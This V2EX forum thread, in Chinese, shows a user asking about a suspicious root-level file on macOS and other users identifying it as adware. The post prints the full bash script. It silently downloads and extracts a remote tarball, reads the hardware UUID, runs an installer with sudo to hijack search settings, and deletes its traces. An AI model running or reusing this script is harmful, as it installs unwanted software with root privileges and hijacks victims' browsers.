macOS Sierra 10.12.6 根目录下出现了一个 file 文件,无后缀,请各位大佬知道是啥

2017-08-24 18:21:39 +08:00
 linlich
#!/bin/bash
func_4(){
/bin/mkdir -p /var/tmp
/usr/bin/curl -s -L -o /var/tmp/sr.tgz "http://c.setmacinstallmedia.download/static/sr/sr_v2.tgz"
/usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp
cd /var/tmp/dvs
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

COUNTRY="CN"
if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ] || [ "$COUNTRY" == "NZ" ]\
  || [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ] || [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\
  || [ "$COUNTRY" == "DE" ]; then
	sudo ./setup.sh "http://www.searchitdown.com/?n=006&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/?n=006&searchsource=69&UM=8&gd=SY1000653" "http://www.searchitdown.com/Results.aspx?n=006&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd" "http://i.firstinstallmac.club/c/cc?id="
else
	sudo ./setup.sh "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=hp&type=YHS_TGE_5a01fc&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=nt&type=YHS_TGE_5a01fc&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=ds&type=TGE_5a01fc" "snowbitt" "upd" "http://i.firstinstallmac.club/c/cc?id="
fi

CLIENT_COMP=""
if [[ ! -z "$CLIENT_COMP" ]]; then
	/usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.firstinstallmac.club/is/if?i="
fi

func_taaVqst(){
sleep 220
rm -rf /var/tmp/dvs
rm -rf /var/tmp/sr.tgz
}
func_taaVqst &

}
func_4 &
3500 次点击
所在节点    macOS
10 条回复
linlich
2017-08-24 18:23:53 +08:00
请各位大佬指导。。
MartinWu
2017-08-24 18:32:31 +08:00
看起来像是往你电脑装些什么东西,。 但是`http://c.setmacinstallmedia.download/static/sr/sr_v2.tgz`已经失效了,所以也不知道里面装的是什么东东。
hxsf
2017-08-24 18:47:42 +08:00
病毒啊 给你换默认搜索啥的 看后面几个链接 随便搜一下就知道了
SourceMan
2017-08-24 18:58:49 +08:00
是不是装破解软件送的病毒?
linlich
2017-08-24 19:23:24 +08:00
@MartinWu 对啊,路径下面的东西也被删了
linlich
2017-08-24 19:24:13 +08:00
@SourceMan 不知道啊,好流氓啊
n6DD1A640
2017-08-24 19:24:27 +08:00
jy01264313
2017-08-24 22:02:32 +08:00
这么明显的病毒啊
linlich
2017-08-24 23:02:33 +08:00
@n6DD1A640 同喜同喜,已经格盘重装了,,,
linlich
2017-08-24 23:03:10 +08:00
@hxsf 重点是咋解决啊,反正已经格盘了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/385538

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX